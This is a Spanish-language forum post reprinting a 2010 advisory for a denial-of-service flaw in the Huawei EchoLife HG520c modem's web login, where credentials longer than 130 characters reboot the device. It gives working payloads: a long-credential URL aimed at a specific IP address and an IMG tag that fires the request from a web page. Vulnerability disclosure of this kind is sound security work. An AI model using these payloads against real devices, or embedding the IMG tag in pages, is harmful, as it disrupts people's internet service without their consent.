Autor Tema: Huawei EchoLife HG520c HTTP Basic Auth D.O.S  (Leído 6665 veces)

0 Usuarios y 1 Visitante están viendo este tema.

SHAKA

  • xMHT
  • **
  • Mensajes: 166
  • Liked: 30
  • HTFP!!!
Huawei EchoLife HG520c HTTP Basic Auth D.O.S
« : octubre 03, 2010, 04:19:29 am »
        =====================================================
            HUAWEI ECHOLIFE HG520c Denegacion de Servicio
        =====================================================

Dispositivo:            Huawei EchoLife HG520c
Version de Software:    V100R001B020Telmex
Version de Firmware:    3.10.18.5-1.0.7.0
Modelos Vulnerables:    HG520c
Fecha de publicacion:   2010-05-31
Criticidad:             Alto
Impacto:                Denegacion de servicio
                        Denegacion de servicio remoto
Ubicacion:              En la interfaz de administracion web (LAN/WAN)
Solucion:               No existe solucion disponible en este momento

______________________________________________________________________

 [Descripcion]
=================
Al entrar a 'http://192.168.1.254/' y logearse con USER y PASSWORD
mayor a 130 caracteres se produce la denegacion de servicio reiniciando
el dispositivo.

 [Exploit]
=================
Desde la LAN o via Client-Side se puede realizar una peticion tipo GET a
la pagina 'http://192.168.1.254/':

http://SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKA
SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAA:SHAKASHAKA
SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKA
SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKA@187.152.241.220
or

<IMG SRC=http://SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKA
SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAA:SHAKASHAKA
SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKA
SHAKASHAKASHAKASHAKASHAKASHAKASHAKASHAKA@187.152.241.220192.168.1.254>
  
-De manera remota tambien al tratar de logearse con la <ip remota>.
_______________________________________________________________________


SHAKA                                                              -BSH-


Thanks to HKM.

Expuesto en Campus Party 2010 "Vulnerabilidades en modems en Mexico" by HKM.
« Última Modificación: octubre 03, 2010, 10:10:07 am por hkm »
Arayashi-ki